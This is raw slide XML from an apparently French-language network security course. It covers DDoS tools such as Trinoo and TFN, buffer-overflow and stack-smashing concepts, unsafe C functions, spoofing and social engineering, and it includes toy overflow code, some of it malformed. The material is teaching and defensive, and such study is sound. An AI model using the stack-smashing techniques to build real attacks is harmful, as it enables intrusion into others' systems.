              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Teardrop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Winnuke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C1361C-B93F-4833-AB89-CF9FA6E2854C}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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DDOS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Déni de service distribué</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>L’attaquant entre dans plusieurs machines pour lancer une attaque au même moment contre un ordinateur cible;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" smtClean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5E9DE1-52B7-4A20-9153-530AD01F5E5C}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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0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Outils DDOS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Trinoo : TCP, UDP;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>TFN : Tribal Flood Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stacheldraht : associe TFN et Trinoo + cryptage entre les composants+màj des démons;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Shaft;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>TFN2K : amélioration de targa + flood(ICMP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Mstream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43E8FD-9065-4E47-87F6-59A90F7D963E}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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4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 se protéger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IDS;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Auditer le réseau à l’aide de scanner;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Find_ddos;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SARA;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DDoSPing;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>RID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Exécuter Zombie Zapper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3D2059-B213-4900-BD88-7F01682013F6}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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41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sz="4000" smtClean="0"/>
              <a:t>Vulnérabilités applicatives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116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Beaucoup d'applications sont vulnérables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>mauvaise programmation (par manque de temps, de motivation, …) ou volontairement (aménagement d'un point d'entrée, …). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Toutes les applications ont besoin de sécurité: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>services réseaux (daemons),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>les applications téléchargées (applet java, …),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>les applications web (scripts cgi, …), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>les applications utilisées par l'administrateur ou disposant d'un bit setuid/setgid, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>visualisateur de données distantes, …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05F8B-118E-43A0-BC67-E61FD0EF6489}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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9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Attaques par débordement de tampon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fr-FR" smtClean="0"/>
              <a:t>Chercher à enregistrer un trop-plein d’informations dans un réceptacle sous dimensionné;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Insérer des données dans un emplacement trop petit;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Buffer overflow :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Disponibilité : DOS;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Intégrité : Modification;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Confidentialité : lecture de données sensibles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="fr-FR" smtClean="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9DE60C-1238-4517-A355-A4901E1FA68B}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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3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 over flow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Appelée aussi "buffer overruns"; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>c'est une vulnérabilité extrêmement étendue (environ 2/3 des vulnérabilités);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Écriture de données en dehors de la zone allouée (pile ou tas).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C9CF51-834B-41CB-831F-F29675E395DE}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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3FB5E42-4406-4798-8BFC-C27DDB49C7CF}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Accès non autorisé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Entité parvenant à accéder à certaines ressources avec la possibilité de les modifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Interception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Un accès non autorisé à un service, une ressource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Exemple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Copie illicite, écoute clandestine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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51464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 over flow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mtClean="0"/>
              <a:t>Si le buffer est une variable C locale, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>on pourra essayer de forcer la fonction à exécuter du code pirate ("stack smashing attack"). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Beaucoup d'applications écrites en langage C sont vulnérables car la simplicité et l'efficacité de ce langage ont prévalu sur les contrôles d'intégrité laissés à la responsabilité du programmeur. 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90673E-D006-42FA-9185-F42D57397E0E}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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8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Gestion des piles sous x86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-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>void function (int a,int b,int c)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t> { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>char buffer1 [5] ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>char buffer2 [10] ; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t> void main () </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>function (1,2,3) ; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/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3FE4D4-2ADE-4837-8AF1-89FC18A3FB85}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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AE9C77-C802-42AE-9541-9D7FF7FC3D5C}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3482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854200"/>
            <a:ext cx="61214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5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E849CA-0296-4C83-8F65-21AA97B8AD0C}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3584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2019300"/>
            <a:ext cx="37465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4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Shell code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mtClean="0"/>
              <a:t>Le buffer overflow </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>peut être utilisé pour provoquer l'exécution de /bin/sh, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>shell présent dans toutes les distributions unix. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/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4182D8-47BF-44D8-9791-FFC37CC3CD44}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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4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 over flow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Programme en exécution : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Données : RAM;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Pile est une partie de la mémoire qui contient les informations dont a besoin un programme en exécution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Buffer : tampon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Espace aléatoire alloué</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Rempli de haut en bas LIFO;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> 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7D2ABF-BF6E-4DB0-9BEF-ABEEAED0BD11}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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 over flow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Exemple de code :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Void func(void)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t>Int I; char buffer(256);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t>For (i=0; i&lt;512;i++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t>Buffer(i)=‘A’:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t>Return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t>}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2C4626-0129-4CAD-A19B-1C23AAA618DB}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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BOF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En C :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Strcat()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Strcpy();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sprintf();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Vsprintf();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Bcopy();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Gets();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Scanf()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Vulnérables : ne font pas pas de vérification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CFD0E5-B460-4D43-9771-8E480B224F9B}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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9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Exemples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NetMeeting;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Outlook;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Linuxconf;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Tooltalk;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>IMPAD;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>AOL Instant Messenger;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>AOL Instant Messenger BuddyIcon;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Windows 2000 Active X Control;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>IIS4.0/5.0 Phone Book Server;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>SQL Server 2000 Extended Stored Procedure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0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C3A10F-8D40-4372-85CA-A1087A77F6AE}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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F149B9-17D3-4FA6-804D-86BA3B022670}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-F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Ingénierie sociale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Une attaque n’utilisant aucune technique,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Très efficace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Nécessite une formation du personnel aux procédures de sécurité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Utilisation des méthodes d’authentification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32198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BA4216-DF6A-4D0E-85B4-C81A75C3AB12}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Usurpation d’identité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600" smtClean="0"/>
              <a:t>Se faire passer pour une autre entité,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t>La capacité d’une entité à fournir des informations d’identité d’une autre entité,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t>Exemple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>Login mot de passe en clair,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>Enregistrement d’une séquence d’autorisation pour une utilisation ultérieure,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t>Attaque par Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>S’authentifier auprès d’une entité au moyen de paquets qui semblent venir d’une adresse source valide. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6433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53BB23-8006-4B15-8D89-B360F634C405}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-F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Motivation des attaquants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FR" smtClean="0"/>
              <a:t>Cupidité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Intrus est payé par quelqu’un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Curiosité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Intrus calé en informatique et curieux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Notoriété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Intrus très calé en informatique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S’introduit dans sites connus pour être difficile à forcer afin de prouver ses compétences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smtClean="0"/>
              <a:t>Respect, reconnaissance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35750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7D97BD-44DC-4400-9609-AC20B42147C4}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Motivation des attaquants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Vengeance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Intrus licencié, rétrogradé ou mal traité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Ignorance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Intrus s’intéresse à l’informatique et tombe par hasard sur une vulnérabilité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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9345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4E9317-9234-45AF-AA41-C092EA07741A}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Acteurs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Amateurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>utilisent des virus pour produire le plus de dégâts possibles sans se soucier de savoir quelles sont les cibles qui seront touchées. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Les meilleurs écrivent eux-mêmes leurs virus, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>les pires exploitent des virus faits par d'autres, sans même savoir comment ils fonctionnent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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0568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C7D006-BE72-4FFB-B8F3-5081BCA08C97}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-F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Acteurs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33925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t>Hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>ont des connaissances très étendues dans les systèmes,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>recherchent toujours de nouvelles failles. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>véritables techniciens,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>Ce sont leurs découvertes qui sont exploitées par les autres utilisateurs de virus. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>leurs découvertes contribuent à créer des systèmes de plus en plus solides et fiables. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>Motivation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100" smtClean="0"/>
              <a:t>Défi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100" smtClean="0"/>
              <a:t>Gloire	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5057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2B704B-CB91-441E-94C4-174DFACCD83A}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Acteurs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Criminel accompli</a:t>
            </a:r>
          </a:p>
          <a:p>
